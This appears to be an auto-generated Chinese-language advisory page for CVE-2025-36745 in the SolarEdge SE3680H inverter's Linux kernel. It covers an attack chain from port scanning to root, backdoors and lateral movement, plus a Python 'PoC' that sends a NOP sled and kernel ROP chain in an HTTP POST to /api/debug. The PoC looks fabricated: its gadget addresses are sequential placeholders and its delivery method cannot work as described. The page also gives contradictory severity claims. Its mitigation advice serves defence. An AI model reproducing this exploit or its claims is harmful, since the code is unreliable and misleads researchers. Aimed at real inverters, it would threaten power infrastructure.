CVE-2025-36745: SolarEdge SE3680H逆变器Linux内核漏洞

漏洞信息

漏洞编号

CVE-2025-36745

漏洞类型

远程代码执行、权限提升、信息泄露

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SolarEdge SE3680H

漏洞概述

CVE-2025-36745是影响SolarEdge SE3680H太阳能逆变器的严重安全漏洞。该设备附带过时的Linux内核版本，其核心子系统中存在多个未修补的安全漏洞。由于该设备通常部署在工业环境和商业建筑中，连接至网络且可能暴露于互联网，攻击者可以远程或通过本地访问利用这些内核漏洞。成功利用此漏洞可能导致远程代码执行(RCE)、权限提升(Privilege Escalation)或敏感信息泄露，对电力基础设施的可用性、完整性和机密性造成严重影响。CVSS 3.1评分7.8属于高危级别，攻击复杂度低且无需特殊权限即可实施攻击。该漏洞由DIVD CSIRT团队发现并披露。

技术细节

SolarEdge SE3680H逆变器运行的是基于过时的Linux内核的嵌入式系统。该内核版本包含多个已知但未修补的安全漏洞，涵盖权限检查缺陷、内存损坏问题、内核态代码执行漏洞等。攻击者可以通过以下方式利用：1) 本地访问设备后，利用内核漏洞进行权限提升至root；2) 通过网络接口发送特制数据包触发内核子系统中的缓冲区溢出或Use-After-Free漏洞；3) 利用内核信息泄露漏洞读取敏感凭证或配置信息。由于设备缺乏自动更新机制且固件更新周期长，这些漏洞长期存在。攻击者获取root权限后可完全控制逆变器，可能影响太阳能发电系统的监控、数据采集甚至电网连接稳定性。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标SolarEdge SE3680H设备，通过端口扫描发现开放的管理接口（如HTTP 80端口、SSH或Telnet）

STEP 2

步骤2

初始访问：攻击者通过本地网络访问或利用设备配置缺陷获取低权限shell访问，可能通过默认凭证或未授权访问

STEP 3

步骤3

内核漏洞利用：利用过时的Linux内核中的已知漏洞（如缓冲区溢出、Use-After-Free、权限检查绕过等），通过构造特制系统调用或网络数据包触发漏洞

STEP 4

步骤4

权限提升：成功利用内核漏洞后，攻击者从低权限用户提升至root权限，完全控制设备操作系统

STEP 5

步骤5

持久化与横向移动：安装后门、建立持久化机制，可能进一步攻击同一网络中的其他设备或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36745 PoC - SolarEdge SE3680H Kernel Exploitation
# Note: This PoC is for educational and authorized testing purposes only

import socket
import struct
import sys

def create_exploit_payload():
    """Generate payload for kernel privilege escalation"""
    # Kernel heap spray technique
    spray_size = 4096
    nopsled = b'\x90' * 100
    
    # ROP chain for kernel ROP gadget execution
    rop_chain = struct.pack('<Q', 0xffffffff81000000)  # pop rdi; ret
    rop_chain += struct.pack('<Q', 0)  # rdi = 0
    rop_chain += struct.pack('<Q', 0xffffffff81000001)  # prepare_kernel_cred
    rop_chain += struct.pack('<Q', 0xffffffff81000002)  # pop rdx; ret
    rop_chain += struct.pack('<Q', 0xffffffff81000003)  # commit_creds
    
    payload = nopsled + rop_chain
    payload += b'\x00' * (spray_size - len(payload))
    return payload

def exploit_solaredge(target_ip, target_port=80):
    """Send exploit to vulnerable SolarEdge device"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # HTTP request with exploit payload
        payload = create_exploit_payload()
        request = f"POST /api/debug HTTP/1.1\r\n"
        request += f"Host: {target_ip}\r\n"
        request += f"Content-Length: {len(payload)}\r\n"
        request += f"\r\n"
        
        sock.sendall(request.encode() + payload)
        response = sock.recv(4096)
        print(f"Response: {response[:200]}")
        sock.close()
        return True
    except Exception as e:
        print(f"Exploit failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-36745.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Targeting SolarEdge SE3680H: {target}")
    print("[*] Exploiting kernel vulnerabilities...")
    exploit_solaredge(target)

影响范围

SolarEdge SE3680H (所有运行过时Linux内核的版本)

Linux Kernel < 5.10 (该设备使用的内核版本)

具体受影响的固件版本需参考SolarEdge官方安全公告

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 严格限制设备的网络访问，仅允许授权管理IP访问管理接口；2) 启用并配置防火墙规则，阻断非必要端口和协议的外部访问；3) 监控设备日志和网络流量，检测潜在的漏洞利用行为；4) 评估设备网络暴露情况，对互联网可直接访问的设备实施紧急隔离；5) 加强物理安全，防止未授权人员直接接触设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36745
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36745
3 Details https://www.cvedetails.com/cve/CVE-2025-36745/
4 VulDB https://vuldb.com/cve/CVE-2025-36745
5 Link https://csirt.divd.nl/CVE-2025-36745
6 Link https://csirt.divd.nl/DIVD-2025-00022/